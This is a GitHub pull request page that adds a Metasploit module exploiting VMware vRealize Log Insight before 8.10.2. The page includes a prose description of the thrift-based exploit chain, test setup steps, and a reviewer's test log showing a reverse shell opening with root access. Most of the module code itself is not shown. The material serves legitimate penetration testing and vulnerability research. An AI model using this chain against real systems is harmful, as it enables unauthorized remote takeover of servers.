Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add VMware vRealize Log Insight unauthenticated RCE exploit #18273

Merged
merged 15 commits into from
Sep 8, 2023
Merged

Add VMware vRealize Log Insight unauthenticated RCE exploit #18273

merged 15 commits into from
Sep 8, 2023

Conversation

EgeBalci
Copy link
Contributor

@EgeBalci EgeBalci commented Aug 8, 2023

Hello 👋

This module exploits multiple vulnerabilities for achieving unauthenticated remote code execution on the VMware vRealize Log Insight version v8.x. Module achieves code execution via triggering a RemotePakDownloadCommand command via the exposed thrift service after obtaining the node token by calling a GetConfigRequest thrift command. After the download, we trigger a PakUpgradeCommand for extracting the specially crafted TAR archive that we served, which then will place the JSP payload under a certain API endpoint (pre-authenticated) location for us to call.

I'm aware that the code looks ugly, but since this is an important target, I wanted to push it asap. I had to manually construct thrift packages because Rex::Proto::Thrift is very premature at the moment. Also, I couldn't find a better way to embed the file contents. (certs and checksums) Open to suggestions.

Testing Environment Setup

For installing the vulnerable version follow the steps below,

  1. To obtain the vulnerable OVA image, first create a customer account at VMware (trial license is sufficient)
  2. Navigate here and download Virtual Appliance
  3. Import the OVA image into a virtualization software (VirtualBox is used for this case).
  4. Start the VMware_vCenter_Log_Insight image and proceed with the initial installation steps through the web interface of the product.

After these steps, the web portal (port 80/443) and Apache thrift service (port 16520) should be accessible.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do use exploit/linux/http/vmware_vrli_rce
  • Do set RHOST [IP]
  • Do check

@EgeBalci EgeBalci mentioned this pull request Aug 8, 2023
Closed
@EgeBalci
Copy link
Contributor Author

Any takers? :)

@adfoster-r7
Copy link
Contributor

Sorry for the delay; the team's been pretty swamped with recent events, DefCon/etc

@jheysel-r7 jheysel-r7 self-assigned this Aug 16, 2023
jheysel-r7
jheysel-r7 reviewed Aug 17, 2023
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for another great module @EgeBalci. I was able to get a session running in the context of the root user after applying a couple of the suggestion I've mentioned here.

modules/exploits/linux/http/vmware_vrli_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/vmware_vrli_rce.rb Show resolved Hide resolved
EgeBalci and others added 7 commits August 18, 2023 20:16
@jheysel-r7 jheysel-r7 removed their assignment Aug 21, 2023
@zeroSteiner zeroSteiner mentioned this pull request Aug 23, 2023
Merged
2 tasks
@smcintyre-r7 smcintyre-r7 self-assigned this Sep 5, 2023
@EgeBalci
Copy link
Contributor Author

EgeBalci commented Sep 7, 2023

Hi folks, I have made lots of changes, here is a small summary.

  • Decodedmf_file.
  • Added extra sleep duration (WaitForUpgradeDuration) after issuing a PakUpgrade command. This is necessary because sometimes PakUpgrade is stalling and we send the doc request too early.
  • Refactored thrift code and added header for getConfig request as suggested.
  • Removed getNodeType thrift call. After a little analysis I discovered we don't actually need it.
  • Added a extra check for SRVHOST because it shouldn't be pointing to localhost.

EgeBalci
EgeBalci commented Sep 7, 2023
View reviewed changes
modules/exploits/linux/http/vmware_vrli_rce.rb

def exploit
# This is important check...
fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Open to suggestions for this one.

@smcintyre-r7
Make some final tweaks
21dde19 
Change strings to reference `VMware` using the proper case. Don't
include CmdStager (because it's unnecessary). Set PrependFork to fix
shell payloads. Move CamelCase options to advanced.
smcintyre-r7
smcintyre-r7 reviewed Sep 8, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I gave this a shot on a v8.10 target and it is working well. I saw in the module description that you had tested it on 8.0.2 so now we have greater coverage.

There were some issues at first with shell payloads until I set PrependFork to true, so you'll see that along with a few other changes I made in 21dde19. With that change in place, staged and unstage, meterpreter and shell payloads all worked.

Testing Output 
Module options (exploit/linux/http/vmware_vrli_rce):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                  192.168.159.28   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                   443              yes       The target port (TCP)
   SSL                     true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                  no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI               /                yes       The URI of the VRLI web service
   THRIFT_PORT             16520            yes       Thrift service port
   THRIFT_TIMEOUT          10               yes       Timeout duration for thrift service
   URIPATH                                  no        The URI to use for this exploit (default is random)
   VHOST                                    no        HTTP server virtual host
   WaitForResponseTimeout  10               yes       The timeout in seconds for RemotePakDownload response
   WaitForUpgradeDuration  2                yes       The sleep duration in seconds for PakUpgrade process


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.159.128  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   VMware vRealize Log Insight < v8.10.2



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/vmware_vrli_rce) > check

[*] 192.168.159.28:443 - Checking if 192.168.159.28:443 can be exploited.
[*] 192.168.159.28:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
msf6 exploit(linux/http/vmware_vrli_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.28:443 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.159.28:443 - Checking if 192.168.159.28:443 can be exploited.
[+] 192.168.159.28:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
[*] 192.168.159.28:443 - Starting Payload Server
[*] 192.168.159.28:443 - Using URL: http://192.168.159.128:8080/vWLEYHv.tar
[*] 192.168.159.28:443 - Fetching thrift config...
[+] 192.168.159.28:443 - Obtained node token: 596f1d93-b227-4550-8cfa-3c511f9c19fe
[*] 192.168.159.28:443 - Sending getNodeType...
[*] 192.168.159.28:443 - Sending RemotePakDownloadCommand...
[*] 192.168.159.28:443 - Sending PakUpgradeCommand...
[*] 192.168.159.28:443 - Encoding the payload as JSP
[*] 192.168.159.28:443 - Malicious TAR payload created (117760 bytes)
[+] 192.168.159.28:443 - Payload requested by 192.168.159.28:443, sending...
[+] 192.168.159.28:443 - PakUpgrade request is successful
[*] 192.168.159.28:443 - Waiting 2 second for PakUpgrade...
[*] 192.168.159.28:443 - 192.168.159.28:443 - Triggering JSP payload...
[*] Sending stage (38 bytes) to 192.168.159.28
[+] 192.168.159.28:443 - Deleted /tmp/vWLEYHv.pak
[+] 192.168.159.28:443 - Deleted /usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/api-v5-documentation.jsp
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.28:45258) at 2023-09-08 16:50:38 -0400
[*] 192.168.159.28:443 - Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/lib/loginsight

Thanks a lot for submitting this module to us! Once the tests pass on the commit I added, I'll get this landed.

@smcintyre-r7 smcintyre-r7 merged commit f1aea83 into rapid7:master Sep 8, 2023
32 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 15, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@zeroSteiner zeroSteiner zeroSteiner left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

@adfoster-r7 adfoster-r7 Awaiting requested review from adfoster-r7

@jheysel-r7 jheysel-r7 Awaiting requested review from jheysel-r7

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
6 participants
@EgeBalci @adfoster-r7 @smcintyre-r7 @zeroSteiner @jheysel-r7 @cgranleese-r7